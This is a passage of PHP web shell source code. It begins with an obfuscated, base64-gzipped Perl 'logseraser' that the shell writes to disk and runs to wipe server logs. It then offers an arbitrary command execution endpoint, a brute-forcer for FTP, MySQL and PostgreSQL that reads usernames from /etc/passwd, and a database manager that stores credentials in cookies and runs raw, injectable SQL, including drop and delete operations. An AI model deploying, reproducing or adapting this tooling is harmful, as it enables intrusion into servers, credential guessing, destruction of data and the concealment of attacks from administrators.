3929 $erase = gzinflate(base64_decode("xVhtb9s2EP6cAv0PXJIBDdZaLfbR27B27boAKVLUwNCtKwqaomwhlKiQVB0vyH8fX/RCUu+usviLRfL48O6eO/LIk+9yzoJ1nAYZZuTxoxPwnu4wwyF4tQfnhOT/vqCp6n5Hw1D2rvfgNxr+yP4GEWXl52qLiZwLzA9taZI9OaUc/AxOX354++en55/Plo8fVQLVL460GL4Gx0nM0fHZLTg5j4D6BmKf4fApCCkQWywXI4Tu4nQDYBoCLiATYM0gusKCe7gZi1MBjj/98FnjrDDBSOBwsVj8kx4vpYAnzwnGGXixbIf5SbBfJNQF3XBwQRGskcbBnELphTwlcXoFflUK9WpwdHTkDSoXwTNwa5mldVnlCGHOo5yQPXgtbbRMvNNAmHBszXv2+Q1jlJlhl4a7AW5ohtM1D0t6iuYcDJVQHkmTGGpnZzTPp2uLoEKf0bOVk9aSnQnkgNnpiRjGFj1Fcw56SqhvzKFvZQhZDBUqjZ+tHIUOSiAwH0UhXscwLRl6rVtzEGRw7yF9RjITWswYXaYREx5GzIzM8Jzjkhf1PQcrGufBOMEWJ0qTSZsZfuhM4ZRAFvOKEtOchZUC6sGIiWxijDLL8akSTTtmZieGwCTLSlp0Yw5SLjTQg1GysSjRNi1HZ8rmkExRk+ejRFbpWyhKTkxrDlI+yDr/Dwl1Eaf5TfAOInC5Ah8fjqWtxZKxckLebP+PI6b46k8g5c0qgVRjlgTSQPdSoI1kJ7ZzSGmz7LveKIfE0yi5A4MF89HRXSsDPiHOwZ/S+phRjcPpsIxZ5alMlv5U6XLlJDo6QU6JUwBIw5ZtbiD3nxdtGdHDCIyr9JCf38CG48mX8c0QHffOSGIxIk1r5SM5kI+DNqpBLmJWk6G+x7PR7cFzNkzF/fKQWjwoq5YdTkgf5lri/07eqQcsubqxN6YptxS+7ZhVjuvXJmnwk+MACxRshcjCgEhTAqgtWcjv46egMYqVzmawY+YXPejq3w7zpYBRb4xE2kACmEG0xU20LhkLxl+wD3QxDFqKfIVKZFMK9JnoiTomtsJ0rNG+/oiFGyvudrsOk6qRpibupO4VPQgteGYJjgpicKLTh0bgMsPpq9VrsNpzgROza1fBXAGVb3Amci01HAe5GlqGnDkaTdTwd4bxCA3LZzGtYR1hPbkCeuRm0r14VBpQvXgwqnzbEbGgL2QrNF/oGefEFmwXsNbxDNYqT7F5la/egKIC7rdbP8k4VhsGWmKqHpyJmVX58NCmon0Cla8CtaJduyVoDs+kbHEh7/emuf5rLWkmAt1s7CigMdixjUzWsbifPgX11bRf3+JqPCP/A1Vtn/amDOpXWJdcdRSESbD6a3Vx+bZmXnbx3IkF2ZOLJGt03PibO7AEdv6MnZlh9RDIhfJJ+wHMM0pJQDTD7jTZlT2TLuT19hevA8RoGnSeOHoi3cSpjyYDHQmnJ9Sad4EocekgF60c/Pg84RvuoCEG+Tb4miDKcDeqkcpTVRtPD2AVAYDLCHjpBYC3D6grgkt+0/oGb6HfcV3MaQnOvhCSFqq4b+teUypamPM8VNJbVIRVSKoGxyhnsdiXMdUK5QhGMCY41CQqlDrikusc5zjge67z0zVzNB3FKaKv7IaQwQK7Ysm8GTg8JXIvgRvshhZEysltfS3m95PzlZJw4XfuWhKhJctvDtop/MwMIM+yrHG8FzR0T1dC7y/fN8qCXGw7Ur0bqjhNSMbl4RfWeEU/wzI0uOBd214ZojUjHEaBcwSojowyETQq3iIEJkSXU554MXTrHh7m+cw9pqpMsbwmMEmxqC1neVoQ2ut/nVRYXQKYzORgccW3X7YxF5TtNZTpXUO7uxXQEpS4uXCU29kJPxCbteL+blGg2YHRF5xVHdRWGnnltzPSCtkhC5y7mmv1TYTZcAaU+0PgzM0YjVS5UWAsCN5AtB+AKiYtqoVbxrpvlB6YX+74pRAPA1m5jwQywguvslLsJnIzLyquAZxrJeruMIlU0e2ByRoOhbySUbvV4vvEmoyuytlVNH9UWxFVZ86Q42nmuyjFO76AxFNYHVOYDaCpqQ2snl6zzCCkkUXSnA4YyXXHSEpFjPCYNXiOrtqB9MggkDnI7Yw3PToOudfpbthFF7oaTuHqEUPoKG/Et93dbzPSWape1VRAiRvPt0hEMudMwdsLpCLNf0dplBfyX3/+Bw=="));
3930 if(is_writable("."))
3931 {
3932 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3933 {
3934 fwrite($openp, $erase);
3935 fclose($openp);
3936 passthru("perl logseraser.pl linux");
3937 unlink("logseraser.pl");
3938 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3939 }
3940 } else
3941 {
3942 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3943 {
3944 fwrite($openp, $erase)or die("Error");
3945 fclose($openp);
3946 $aidx = passthru("perl logseraser.pl linux");
3947 unlink("logseraser.pl");
3948 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3949 }
3950 }
3951 }
3952 else
3953 {
3954 $check = shell_exec($_GET['mycmd']);
3955 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3956 }
3957}
3958else if(isset($_GET['prototype']))
3959{
3960 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3961 if( $_GET['prototype'] == 'ftp' )
3962 {
3963 function BruteFun($ip,$port,$login,$pass)
3964 {
3965 $fp = @ftp_connect($ip, $port?$port:21);
3966 if(!$fp) return false;
3967 $res = @ftp_login($fp, $login, $pass);
3968 @ftp_close($fp);
3969 return $res;
3970 }
3971 }
3972 elseif( $_GET['prototype'] == 'mysql' )
3973 {
3974 function BruteFun($ip,$port,$login,$pass)
3975 {
3976 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3977 @mysql_close($res);
3978 return $res;
3979 }
3980 }
3981 elseif( $_GET['prototype'] == 'pgsql' )
3982 {
3983 function BruteFun($ip,$port,$login,$pass)
3984 {
3985 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3986 $res = @pg_connect($str);
3987 @pg_close($res);
3988 return $res;
3989 }
3990 }
3991
3992 $success = 0;
3993 $attempts = 0;
3994 $server = explode(":", $_GET['server']);
3995 if($_GET['type'] == 1)
3996 {
3997 $temp = @file('/etc/passwd');
3998 if( is_array($temp))
3999 foreach($temp as $line)
4000 {
4001 $line = explode(":", $line);
4002 ++$attempts;
4003 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4004 {
4005 $success++;
4006 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4007 }
4008 if(@$_GET['reverse'])
4009 {
4010 $tmp = "";
4011 for($i=strlen($line[0])-1; $i>=0; --$i)
4012 $tmp .= $line[0][$i];
4013 ++$attempts;
4014 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4015 {
4016 $success++;
4017 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4018 }
4019 }
4020 }
4021 }
4022 elseif($_GET['type'] == 2)
4023 {
4024 $temp = @file($_GET['dict']);
4025 if( is_array($temp) )
4026 foreach($temp as $line)
4027 {
4028 $line = trim($line);
4029 ++$attempts;
4030 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4031 {
4032 $success++;
4033 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4034 }
4035 }
4036 }
4037 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4038}
4039// Execute Query
4040else if(isset($_GET["executeit"]))
4041{
4042 if(isset($_GET['username']) && isset($_GET['server']))
4043 {
4044 $dbserver = $_GET['server'];
4045 $dbuser = $_GET['username'];
4046 $dbpass = $_GET['password'];
4047 if(mysql_connect($dbserver,$dbuser,$dbpass))
4048 {
4049 setcookie("dbserver", $dbserver);
4050 setcookie("dbuser", $dbuser);
4051 setcookie("dbpass", $dbpass);
4052
4053 listdatabase();
4054 }
4055 else
4056 echo "cannotconnect";
4057 }
4058}
4059else if(isset($_GET['action']) && isset($_GET['dbname']))
4060
4061
4062 {
4063 if($_GET['action'] == "createDB")
4064 {
4065 $dbname = $_GET['dbname'];
4066 $dbserver = $_COOKIE["dbserver"];
4067 $dbuser = $_COOKIE["dbuser"];
4068 $dbpass = $_COOKIE["dbpass"];
4069 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4070 mysql_query("create database $dbname",$mysqlHandle);
4071 listdatabase();
4072 }
4073 if($_GET['action'] == 'dropDB')
4074 {
4075 $dbname = $_GET['dbname'];
4076 $dbserver = $_COOKIE["dbserver"];
4077 $dbuser = $_COOKIE["dbuser"];
4078 $dbpass = $_COOKIE["dbpass"];
4079 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4080 mysql_query("drop database $dbname",$mysqlHandle);
4081 mysql_close($mysqlHandle);
4082 listdatabase();
4083 }
4084
4085 if($_GET['action'] == 'listTables')
4086 {
4087 listtable();
4088 }
4089
4090 // Create Tables
4091 if($_GET['action'] == "createtable")
4092 {
4093 $dbserver = $_COOKIE["dbserver"];
4094 $dbuser = $_COOKIE["dbuser"];
4095 $dbpass = $_COOKIE["dbpass"];
4096 $dbname = $_GET['dbname'];
4097 $tablename = $_GET['tablename'];
4098 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4099 mysql_select_db($dbname);
4100 mysql_query("CREATE TABLE $tablename ( no INT )");
4101 listtable();
4102 }
4103
4104 // Drop Tables
4105 if($_GET['action'] == "dropTable")
4106 {
4107 $dbserver = $_COOKIE["dbserver"];
4108 $dbuser = $_COOKIE["dbuser"];
4109 $dbpass = $_COOKIE["dbpass"];
4110 $dbname = $_GET['dbname'];
4111 $tablename = $_GET['tablename'];
4112 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4113 mysql_select_db($dbname);
4114 mysql_query("drop table $tablename");
4115 listtable();
4116 }
4117
4118 // Empty Tables
4119 if($_GET['action'] == "empty")
4120 {
4121 $dbserver = $_COOKIE["dbserver"];
4122 $dbuser = $_COOKIE["dbuser"];
4123 $dbpass = $_COOKIE["dbpass"];
4124 $dbname = $_GET['dbname'];
4125 $tablename = $_GET['tablename'];
4126 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4127 mysql_select_db($dbname);
4128 mysql_query("delete from $tablename");
4129 listtable();
4130 }
4131
4132 // Empty Tables
4133 if($_GET['action'] == "dropField")
4134 {
4135 $dbserver = $_COOKIE["dbserver"];
4136 $dbuser = $_COOKIE["dbuser"];
4137 $dbpass = $_COOKIE["dbpass"];
4138 $dbname = $_GET['dbname'];
4139 $tablename = $_GET['tablename'];
4140 $fieldname = $_GET['fieldname'];
4141 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4142 mysql_select_db($dbname);
4143 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4144 mysql_select_db( $dbname, $mysqlHandle );
4145 mysql_query( $queryStr , $mysqlHandle );
4146 listtable();
4147 }
4148
4149 if($_GET['action'] == 'viewdb')
4150 {
4151 listdatabase();
4152 }
4153
4154 // View Table Schema
4155 if($_GET['action'] == "viewSchema")
4156 {
4157 $dbserver = $_COOKIE["dbserver"];
4158 $dbuser = $_COOKIE["dbuser"];
4159 $dbpass = $_COOKIE["dbpass"];
4160 $dbname = $_GET['dbname'];
4161 $tablename = $_GET['tablename'];
4162 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4163 mysql_select_db($dbname);
4164 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4165 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4166 $num = mysql_num_rows( $pResult );
4167 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4168 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4169 for( $i = 0; $i < $num; $i++ )
4170 {
4171 $field = mysql_fetch_array( $pResult );
4172 echo "<tr>\n";
4173 echo "<td>".$field["Field"]."</td>\n";
4174 echo "<td>".$field["Type"]."</td>\n";
4175 echo "<td>".$field["Null"]."</td>\n";
4176 echo "<td>".$field["Key"]."</td>\n";
4177 echo "<td>".$field["Default"]."</td>\n";
4178 echo "<td>".$field["Extra"]."</td>\n";
4179 $fieldname = $field["Field"];
4180 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4181 echo "</tr>\n";
4182 }
4183 echo "</table>";
4184 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4185 }
4186
4187 // Execute Query
4188 if($_GET['action'] == "executequery")
4189 {
4190 $dbserver = $_COOKIE["dbserver"];
4191 $dbuser = $_COOKIE["dbuser"];
4192 $dbpass = $_COOKIE["dbpass"];
4193 $dbname = $_GET['dbname'];
4194 $tablename = $_GET['tablename'];
4195 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4196 mysql_select_db($dbname);
4197 $result = mysql_query($_GET['executemyquery']);
4198
4199 // results
4200 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4201
4202 $count = 0;
4203 while ($row = mysql_fetch_assoc($result))
4204 {
4205 echo "<tr>\r\n";
4206
4207 if ($count==0) // list column names
4208 {
4209 echo "<tr>\r\n";
4210 while($key = key($row))
4211 {
4212 echo "<td><b>" . $key . "</b></td>\r\n";
4213 next($row);
4214 }
4215 echo "</tr>\r\n";
4216 }
4217
4218 foreach($row as $r) // list content of column names
4219 {
4220 if ($r=='') $r = '<font >NULL</font>';
4221 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4222 }
4223 echo "</tr>\r\n";
4224 $count++;
4225 }
4226 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4227 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4228 }
4229
4230 // View Table Data
4231 if($_GET['action'] == "viewdata")
4232 {
4233 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4234 $dbserver = $_COOKIE["dbserver"];
4235 $dbuser = $_COOKIE["dbuser"];
4236 $dbpass = $_COOKIE["dbpass"];
4237 $dbname = $_GET['dbname'];
4238 $tablename = $_GET['tablename'];
4239 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4240 ?>
4241 <br><br>
4242 <form>
4243 <table>
4244 <tr>
4245 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4246 </tr>
4247 <tr>
4248 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4249 </tr>
4250 </table>
4251 </form>
4252 <?php
4253 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4254 mysql_select_db($dbname);
4255
4256 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4257 $row = mysql_fetch_array($sql);
4258 $rowid = $row['COLUMN_NAME'];
4259
4260 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4261 if( $tablename != "" )
4262 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4263 else
4264 echo "<font size=3 class=txt>$dbname</font><br>";
4265
4266 $queryStr = "";
4267 $pag = 0;
4268 $queryStr = stripslashes( $queryStr );
4269 if( $queryStr == "" )
4270 {
4271 if(isset($_REQUEST['page']))
4272 {
4273 $res = mysql_query("select * from $tablename");
4274 $getres = mysql_num_rows($res);
4275 $coun = ceil($getres/30);
4276 if($_REQUEST['page'] != 1)
4277
4278 $pag = $_REQUEST['page'] * 30;
4279 else
4280 $pag = $_REQUEST['page'] * 30;
4281
4282 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4283 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4284 $arrcount = 1;
4285 $arrdata[$arrcount] = 0;
4286 while($row = mysql_fetch_array($sql))
4287 {
4288 $arrdata[$arrcount] = $row[$rowid];
4289 $arrcount++;
4290 }
4291 }
4292 else
4293 {
4294 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4295 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4296 $arrcount = 1;
4297 $arrdata[$arrcount] = 0;
4298 while($row = mysql_fetch_array($sql))
4299 {
4300 $arrdata[$arrcount] = $row[$rowid];
4301 $arrcount++;
4302 }
4303 }
4304 if( $orderby != "" )
4305 $queryStr .= " ORDER BY $orderby";
4306 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4307 }
4308
4309
4310 $pResult = mysql_query($queryStr );
4311 $fieldt = mysql_fetch_field($pResult);
4312 $tablename = $fieldt->table;
4313 $errMsg = mysql_error();
4314
4315 $GLOBALS[queryStr] = $queryStr;
4316
4317 if( $pResult == false )
4318 {
4319 echoQueryResult();
4320 return;
4321 }
4322 if( $pResult == 1 )
4323 {
4324 $errMsg = "Success";
4325 echoQueryResult();
4326 return;
4327 }
4328
4329 echo "<hr color='#1B1B1B'>\n";
4330
4331 $row = mysql_num_rows( $pResult );
4332 $col = mysql_num_fields( $pResult );
4333
4334 if( $row == 0 )
4335 {
4336 echo "<font size=3>No Data Exist!</font>";
4337 return;
4338 }
4339
4340 if( $rowperpage == "" ) $rowperpage = 30;
4341 if( $page == "" ) $page = 0;
4342 else $page--;
4343 mysql_data_seek( $pResult, $page * $rowperpage );
4344
4345 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4346 echo "<tr>\n";
4347 for( $i = 0; $i < $col; $i++ )
4348 {
4349 $field = mysql_fetch_field( $pResult, $i );
4350 echo "<th>";
4351 if($action == "viewdata")
4352 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4353 else
4354 echo $field->name."\n";
4355 echo "</th>\n";
4356 }
4357 echo "<th colspan=2>Action</th>\n";
4358 echo "</tr>\n";
4359 $num=1;
4360
4361
4362 $acount = 1;
4363
4364 for( $i = 0; $i < $rowperpage; $i++ )
4365 {
4366 $rowArray = mysql_fetch_row( $pResult );
4367 if( $rowArray == false ) break;
4368 echo "<tr>\n";
4369 $key = "";
4370 for( $j = 0; $j < $col; $j++ )
4371 {
4372 $data = $rowArray[$j];
4373
4374 $field = mysql_fetch_field( $pResult, $j );
4375 if( $field->primary_key == 1 )
4376 $key .= "&" . $field->name . "=" . $data;
4377
4378 if( strlen( $data ) > 30 )
4379 $data = substr( $data, 0, 30 ) . "...";
4380 $data = htmlspecialchars( $data );
4381 echo "<td>\n";
4382 echo "<font class=txt>$data</font>\n";
4383 echo "</td>\n";
4384 }
4385
4386 if(!is_numeric($arrdata[$acount]))
4387 echo "<td colspan=2>No Key</td>\n";
4388 else
4389 {
4390 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4391 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4392 $acount++;
4393 }
4394 }
4395 echo "</tr>\n";
4396
4397
4398 echo "</table>";
4399 if($arrcount > 30)
4400 {
4401 $res = mysql_query("select * from $tablename");
4402 $getres = mysql_num_rows($res);
4403 $coun = ceil($getres/30);
4404 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4405 for($i=0;$i<$coun;$i++)
4406 echo "<option value=$i>$i</option>";
4407
4408 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4409 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4410 }
4411 }
4412
4413 // Delete Table Data
4414 if($_GET['action'] == "deleteData")
4415 {
4416 $dbserver = $_COOKIE["dbserver"];
4417 $dbuser = $_COOKIE["dbuser"];
4418 $dbpass = $_COOKIE["dbpass"];
4419 $dbname = $_GET['dbname'];
4420 $tablename = $_GET['tablename'];
4421 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4422 mysql_select_db($dbname);
4423 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4424 $row = mysql_fetch_array($sql);
4425 $row = $row['COLUMN_NAME'];
4426 $rowid = $_GET[$row];
4427 mysql_query("delete from $tablename where $row = '$rowid'");
4428 listtable();
4429 }
4430 // Edit Table Data
4431 if($_GET['action'] == "editData")
4432 {
4433 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4434 $dbserver = $_COOKIE["dbserver"];
4435 $dbuser = $_COOKIE["dbuser"];
4436 $dbpass = $_COOKIE["dbpass"];
4437 $dbname = $_GET['dbname'];
4438 $tablename = $_GET['tablename'];
4439 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4440 ?>
4441 <br><br>
4442 <form action="<?php echo $self; ?>" method="post">
4443 <?php
4444 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4445 mysql_select_db($dbname);
4446
4447 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4448 $row = mysql_fetch_array($sql);
4449 $row = $row['COLUMN_NAME'];
4450 $rowid = $_GET[$row];
4451
4452 $pResult = mysql_list_fields( $dbname, $tablename );
4453 $num = mysql_num_fields( $pResult );
4454
4455 $key = "";
4456 for( $i = 0; $i < $num; $i++ )
4457 {
4458 $field = mysql_fetch_field( $pResult, $i );
4459 if( $field->primary_key == 1 )
4460 if( $field->numeric == 1 )
4461 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4462 else
4463 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4464 }
4465 $key = substr( $key, 0, strlen($key)-4 );
4466
4467 mysql_select_db( $dbname, $mysqlHandle );
4468 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4469 $data = mysql_fetch_array( $pResult );
4470
4471 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4472 echo "<tr>\n";
4473 echo "<th>Name</th>\n";
4474 echo "<th>Type</th>\n";
4475 echo "<th>Function</th>\n";
4476 echo "<th>Data</th>\n";
4477 echo "</tr>\n";
4478
4479 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4480 $num = mysql_num_rows( $pResult );
4481
4482 $pResultLen = mysql_list_fields( $dbname, $tablename );
4483 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4484 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4485 for( $i = 0; $i < $num; $i++ )
4486 {
4487 $field = mysql_fetch_array( $pResult );
4488 $fieldname = $field["Field"];
4489 $fieldtype = $field["Type"];
4490 $len = mysql_field_len( $pResultLen, $i );
4491
4492 echo "<tr>";
4493 echo "<td>$fieldname</td>";
4494 echo "<td>".$field["Type"]."</td>";
4495 echo "<td>\n";
4496 echo "<select name=${fieldname}_function class=sbox>\n";
4497 echo "<option>\n";
4498 echo "<option>ASCII\n";
4499 echo "<option>CHAR\n";
4500 echo "<option>SOUNDEX\n";
4501 echo "<option>CURDATE\n";
4502 echo "<option>CURTIME\n";
4503 echo "<option>FROM_DAYS\n";
4504 echo "<option>FROM_UNIXTIME\n";
4505 echo "<option>NOW\n";
4506 echo "<option>PASSWORD\n";
4507 echo "<option>PERIOD_ADD\n";
4508 echo "<option>PERIOD_DIFF\n";
4509 echo "<option>TO_DAYS\n";
4510 echo "<option>USER\n";
4511 echo "<option>WEEKDAY\n";
4512 echo "<option>RAND\n";
4513 echo "</select>\n";
4514 echo "</td>\n";
4515 $value = htmlspecialchars($data[$i]);
4516 $type = strtok( $fieldtype, " (,)\n" );
4517 if( $type == "enum" || $type == "set" )
4518 {
4519 echo "<td>\n";
4520 if( $type == "enum" )
4521 echo "<select name=$fieldname class=box>\n";
4522 else if( $type == "set" )
4523 echo "<select name=$fieldname size=4 class=box multiple>\n";
4524 while( $str = strtok( "'" ) )
4525 {
4526 if( $value == $str )
4527 echo "<option selected>$str\n";
4528 else
4529 echo "<option>$str\n";
4530 strtok( "'" );
4531 }
4532 echo "</select>\n";
4533 echo "</td>\n";
4534 }
4535 else
4536 {
4537 if( $len < 40 )
4538 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4539 else
4540 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4541 }
4542 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4543 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4544 echo "</tr>";
4545 }
4546 $fundata1=eregi_replace(',$', '', $fundata1);
4547 $fundata2=eregi_replace(',$', '', $fundata2);
4548
4549 echo "</table><p>\n";
4550 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4551 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4552 echo "</form>\n";
4553 }
4554 }
4555// Edit Submit Table Data
4556else if($_REQUEST['action'] == "editsubmitData")
4557{
4558 $dbserver = $_COOKIE["dbserver"];
4559 $dbuser = $_COOKIE["dbuser"];
4560 $dbpass = $_COOKIE["dbpass"];
4561 $dbname = $_POST['dbname'];
4562 $tablename = $_POST['tablename'];
4563
4564 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4565 mysql_select_db($dbname);
4566
4567 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4568 $row = mysql_fetch_array($sql);
4569 $row = $row['COLUMN_NAME'];
4570 $rowid = $_POST[$row];
4571
4572 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4573 $num = mysql_num_rows( $pResult );
4574
4575 $rowcount = $num;
4576
4577 $pResultLen = mysql_list_fields( $dbname, $tablename );
4578
4579 for( $i = 0; $i < $num; $i++ )
4580 {
4581 $field = mysql_fetch_array( $pResult );
4582 $fieldname = $field["Field"];
4583 $arrdata = $_REQUEST[$fieldname];
4584
4585 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4586 $rowcount--;
4587 if($rowcount != 0)
4588 $str .= ",";
4589 }
4590
4591 $str = "update $tablename set" . $str . " where $row=$rowid";
4592 mysql_query($str);
4593 ?><div id="showsql"></div><?php
4594}
4595// Insert Table Data
4596else if($_REQUEST['action'] == "insertdata")
4597{
4598 $dbserver = $_COOKIE["dbserver"];
4599 $dbuser = $_COOKIE["dbuser"];
4600 $dbpass = $_COOKIE["dbpass"];
4601 $dbname = $_POST['dbname'];
4602 $tablename = $_POST['tablename'];
4603
4604 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4605 mysql_select_db($dbname);
4606
4607 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4608 $row = mysql_fetch_array($sql);
4609 $row = $row['COLUMN_NAME'];
4610 $rowid = $_POST[$row];
4611
